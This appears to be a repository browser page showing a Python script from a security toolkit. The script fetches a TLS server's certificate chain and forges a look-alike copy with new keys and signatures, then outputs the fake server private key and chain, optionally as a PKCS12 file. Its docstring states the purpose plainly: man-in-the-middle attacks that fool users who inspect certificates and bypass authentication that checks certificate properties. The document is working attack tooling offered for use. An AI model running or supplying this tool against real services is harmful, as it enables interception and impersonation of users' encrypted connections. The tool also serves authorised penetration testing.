source: trunk/bin/bletchley-clonecertchain @ 79

Last change on this file since 79 was 75, checked in by tim, 10 years ago

more improvements to handshake

  • Property svn:executable set to *
File size: 8.9 KB
Line 
1#!/usr/bin/env python3
2#-*- mode: Python;-*-
3#
4# Requires Python 3+
5
6
7'''
8An experimental script which attempts to clone a server certificate's entire
9certificate chain, ideally altering only the keys and signatures along the
10way.
11
12This is useful in a few man-in-the-middle attack situations, including:
13- You swap out certificates on a user and they manually inspect the certificate
14  properties before accepting them.  Identical properties are more convincing.
15
16- A product includes special-purpose certificate properties that are validated
17  with custom procedures (e.g. client user name, product serial number, ...). 
18  If these properties are validated but the certificate's CA isn't, then cloning
19  the full set of certificate properties is essential to bypass the
20  authentication.
21
22Currently, this script is somewhat limited and buggy, but will hopefully
23improve over time.  Patches welcome!
24
25
26Copyright (C) 2014 Blindspot Security LLC
27Author: Timothy D. Morgan
28
29 This program is free software: you can redistribute it and/or modify
30 it under the terms of the GNU Lesser General Public License, version 3,
31 as published by the Free Software Foundation.
32
33 This program is distributed in the hope that it will be useful,
34 but WITHOUT ANY WARRANTY; without even the implied warranty of
35 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
36 GNU General Public License for more details.
37
38 You should have received a copy of the GNU General Public License
39 along with this program.  If not, see <http://www.gnu.org/licenses/>.
40'''
41
42import sys
43import argparse
44import traceback
45import socket
46try:
47    import OpenSSL
48    from OpenSSL import SSL
49except:
50    sys.stderr.write('ERROR: Could not locate pyOpenSSL module.  Under Debian-based systems, try:\n')
51    sys.stderr.write('       # apt-get install python3-openssl\n')
52    sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n')
53    sys.exit(2)
54
55
def createClientContext(method=SSL.SSLv3_METHOD):
    '''
    Build a client-side SSL context that never rejects the peer certificate.

    method -- protocol method constant passed straight to SSL.Context
              (defaults to SSL.SSLv3_METHOD).

    Returns the configured SSL.Context.
    '''
    def acceptAnything(connection, certificate, errnum, depth, ok):
        # Verification callback: report success regardless of the arguments.
        return True

    context = SSL.Context(method)
    context.set_verify(SSL.VERIFY_NONE, acceptAnything)
    return context
60
61
def fetchCertificateChain(host, port):
    '''
    Connect to host:port and return the certificate chain the server presents.

    A fresh TCP connection is made for each SSL/TLS protocol method in turn
    and the first non-empty chain obtained is returned.  A failed handshake
    is reported on stderr but is not fatal: the chain is still requested from
    the connection afterwards, in case it is available despite the failure.

    host -- host name or IP address to connect to
    port -- TCP port number

    Returns the value of get_peer_cert_chain() from the first attempt that
    yields a non-empty chain, otherwise the last (empty/None) result.
    Socket-level connection errors are not caught and propagate to the caller.
    '''
    # Look the method constants up by name so that a pyOpenSSL build lacking
    # one of them simply skips that protocol rather than raising
    # AttributeError before any attempt is made.
    method_names = ('SSLv23_METHOD', 'TLSv1_METHOD',
                    'TLSv1_1_METHOD', 'TLSv1_2_METHOD',
                    'SSLv3_METHOD', 'SSLv2_METHOD')
    protocols = [getattr(SSL, name) for name in method_names
                 if hasattr(SSL, name)]

    chain = None
    for p in protocols:
        # Reset per attempt so a failure while constructing the connection
        # can never leave us using a stale (or unbound) object.
        server = None
        serverSock = socket.socket()
        try:
            serverSock.connect((host, port))

            try:
                server = SSL.Connection(createClientContext(p), serverSock)
                server.set_connect_state()
                server.do_handshake()
            except Exception:
                sys.stderr.write("Exception during handshake with server: \n")
                traceback.print_exc(file=sys.stderr)
                sys.stderr.write("\nThis could happen because the server requires "
                                 "certain SSL/TLS versions or a client certificiate."
                                 "  Have no fear, we'll keep trying...\n\n")

            # Deliberately attempted even after a handshake error.
            if server is not None:
                chain = server.get_peer_cert_chain()
        finally:
            # One socket per attempt; always release it.
            serverSock.close()

        if chain:
            return chain

    return chain
88
89
def normalizeCertificateName(cert_name):
    '''
    Return the components of cert_name as a sorted tuple.

    cert_name -- object exposing get_components(), which returns a list of
                 name components

    The result is hashable and independent of the original component order,
    so it can be compared and used as a dictionary key.
    '''
    return tuple(sorted(cert_name.get_components()))
94
95
def normalizeCertificateChain(chain):
    '''
    Re-order a certificate chain by following subject/issuer names.

    chain -- iterable of certificates exposing get_subject() and get_issuer()

    The "root" is the first certificate that is either self-issued (issuer
    equals subject) or whose issuer does not appear as a subject in the
    chain.  Starting from that root, each next certificate is the one whose
    issuer name equals the current certificate's subject name.

    Returns a new list in which the root is LAST and each certificate is
    immediately preceded by the certificate it issued.  Certificates that
    cannot be linked to the root are omitted.  An empty list is returned if
    no root can be identified.
    '''
    # Compute the normalized names once per certificate.
    named = [(c,
              normalizeCertificateName(c.get_subject()),
              normalizeCertificateName(c.get_issuer())) for c in chain]

    # Organize certificates by subject and issuer for quick lookups
    subject_table = {}
    issuer_table = {}
    for c, s, i in named:
        subject_table[s] = c
        # A self-issued certificate must not be recorded as its own child;
        # otherwise walking down from the root would find the root again
        # and never terminate.
        if i != s:
            issuer_table[i] = c

    # Now find root or highest-level intermediary
    root = None
    for c, s, i in named:
        if (i == s) or (i not in subject_table):
            if root is not None:
                sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.")
            else:
                # Go with the first identified "root", since that's more likely to link up with the server cert
                root = c

    # Finally, walk from the root downward, then flip so the root ends up last
    top_down = []
    visited = set()
    nxt = root
    while nxt is not None and id(nxt) not in visited:
        # The visited set guards against name cycles (e.g. duplicate subjects).
        visited.add(id(nxt))
        top_down.append(nxt)
        nxt = issuer_table.get(normalizeCertificateName(nxt.get_subject()))

    top_down.reverse()
    return top_down
125   
126
def genFakeKey(certificate):
    '''
    Generate a brand new key pair mirroring the certificate's public key.

    certificate -- certificate exposing get_pubkey()

    Returns a freshly generated OpenSSL.crypto.PKey whose type and bit
    length are taken from the certificate's existing public key.
    '''
    original = certificate.get_pubkey()
    key_type = original.type()
    key_bits = original.bits()

    replacement = OpenSSL.crypto.PKey()
    replacement.generate_key(key_type, key_bits)
    return replacement
133
134
def getDigestAlgorithm(certificate):
    '''
    Guess the digest name used by the certificate's signature algorithm.

    certificate -- certificate exposing get_signature_algorithm(), which
                   returns the algorithm name as bytes

    Returns one of 'md5', 'sha224', 'sha256', 'sha384' or 'sha512' when that
    name occurs (case-insensitively) in the signature algorithm name, and
    'sha1' otherwise.  Recognizing the SHA-2 family keeps a re-signed
    certificate on the same digest as the original instead of silently
    downgrading it to SHA-1.
    '''
    # XXX: ugly hack because pyopenssl API for this is limited
    algorithm = certificate.get_signature_algorithm().lower()
    for digest in ('md5', 'sha224', 'sha256', 'sha384', 'sha512'):
        if digest.encode('ascii') in algorithm:
            return digest

    # Historical default for anything not recognized above.
    return 'sha1'
141
142
def deleteExtension(certificate, index):
    '''
    Remove the extension at position index from certificate, in place.

    certificate -- pyOpenSSL certificate; its private _x509 handle is passed
                   directly to the C library
    index       -- position of the extension to delete

    pyOpenSSL offers no call for this, so X509_delete_ext() is invoked via
    cffi on a separately loaded 'libssl.so'.
    NOTE(review): this assumes the loaded library is the same OpenSSL build
    that pyOpenSSL itself uses -- confirm on the target platform.
    '''
    from cffi import FFI
    ffi = FFI()
    ffi.cdef('''void* X509_delete_ext(void* x, int loc);
                void X509_EXTENSION_free(void* ext);''')
    libssl = ffi.dlopen('libssl.so')
    ext = libssl.X509_delete_ext(certificate._x509, index)

    # X509_delete_ext() hands ownership of the removed extension to the
    # caller; release it so it is not leaked.  NULL means nothing was removed.
    if ext != ffi.NULL:
        libssl.X509_EXTENSION_free(ext)
151
152
def removePeskyExtensions(certificate):
    '''
    Strip the subjectKeyIdentifier and authorityKeyIdentifier extensions
    from certificate, in place.

    certificate -- certificate exposing get_extension_count() and
                   get_extension(index)

    Returns None.
    '''
    unwanted = (b'subjectKeyIdentifier', b'authorityKeyIdentifier')

    position = 0
    while position < certificate.get_extension_count():
        extension = certificate.get_extension(position)
        if extension.get_short_name() in unwanted:
            #XXX: would be nice if each of these extensions were re-added with appropriate values
            deleteExtension(certificate, position)
            # Stay on the same position: it is examined again on the next
            # pass, after the deletion.
        else:
            position += 1
170
171
def genFakeCertificateChain(cert_chain):
    '''
    Forge a certificate chain by replacing every key and signature.

    cert_chain -- non-empty list of certificates whose LAST element is the
                  highest-level authority (presumably the order in which the
                  server presented them, server certificate first -- verify
                  against the caller)

    Each certificate, processed from the last element to the first:
      * receives a newly generated key (see genFakeKey),
      * loses its key-identifier extensions (see removePeskyExtensions),
      * is signed by the key generated for the previously processed
        certificate; the top-most certificate is signed with its own new key.
    If the top-most certificate is not self-issued, its issuer is first
    overwritten with its own subject.

    The certificate objects are modified in place.  The list passed in is
    NOT reordered.

    Returns (key, chain): the key generated for cert_chain[0], and a new
    list holding the forged certificates in the same order as cert_chain.
    Raises IndexError if cert_chain is empty.
    '''
    # Work on a reversed copy so the caller's list keeps its order.
    top_down = list(reversed(cert_chain))  # start with highest level authority

    top = top_down[0]
    i = normalizeCertificateName(top.get_issuer())
    s = normalizeCertificateName(top.get_subject())
    if s != i:
        # XXX: consider retrieving root locally and including a forged version instead
        top.set_issuer(top.get_subject())

    ret_val = []
    prev = None
    for c in top_down:
        k = genFakeKey(c)
        c.set_pubkey(k)
        removePeskyExtensions(c)
        # The top-most certificate has no forged parent, so it signs itself.
        signer = k if prev is None else prev
        c.sign(signer, getDigestAlgorithm(c))
        prev = k
        ret_val.append(c)

    ret_val.reverse()
    return k, ret_val
199
200
# Command-line interface: positional host, optional port, and optional PKCS12
# output settings.
parser = argparse.ArgumentParser(
    description="An experimental script which attempts to clone an SSL server's"
    " entire certificate chain, ideally altering only the keys and signatures"
    " along the way.  The script prints results to stdout, starting with a PKCS7 (PEM)"
    " key (the fake server private key) followed by the newly forged certificate"
    " chain, also in PEM format.  (The new intermediate and root private keys are"
    " not currently printed, but will likely be somehow available in a future"
    " version.)")

parser.add_argument('host', nargs=1, default=None,
                    help='IP address or host name of server')
parser.add_argument('port', nargs='?', type=int, default=443,
                    help='TCP port number of SSL service (default: 443)')
parser.add_argument(
    '--p12', dest='p12_filename', type=str, required=False, default=None,
    help='If specified, a PKCS12 file will be written with the generated certificates'
    ' and server key (in addition to normal PKCS7 output).  NOTE: the file specified'
    ' will be overwritten without prompting if it already exists.')
parser.add_argument(
    '--p12password', dest='p12_password', type=str, required=False, default='bletchley',
    help='If specified along with the --p12 argument, the PKCS12 file will use this password'
    ' to encrypt the server private key.  (Otherwise, the password "bletchley" is used).')
options = parser.parse_args()

# Retrieve the real chain from the server; give up if nothing was obtained.
chain = fetchCertificateChain(options.host[0], options.port)
if not chain:
    sys.stderr.write("ERROR: Could not retrieve server certificate\n\n")
    sys.exit(2)

# Forge the chain, then print the new server key followed by every forged
# certificate, all PEM encoded.
fake_key, fake_chain = genFakeCertificateChain(chain)
print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8'))
for c in fake_chain:
    print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))

if options.p12_filename:
    p12 = OpenSSL.crypto.PKCS12()
    p12.set_ca_certificates(fake_chain[1:])
    p12.set_privatekey(fake_key)
    p12.set_certificate(fake_chain[0])

    # Build the export before touching the output file, so a failure here
    # cannot leave an existing file truncated; the with-block guarantees the
    # handle is closed even if the write fails.
    p12_data = p12.export(passphrase=options.p12_password.encode('utf-8'))
    with open(options.p12_filename, 'wb') as p12_file:
        p12_file.write(p12_data)
Note: See TracBrowser for help on using the repository browser.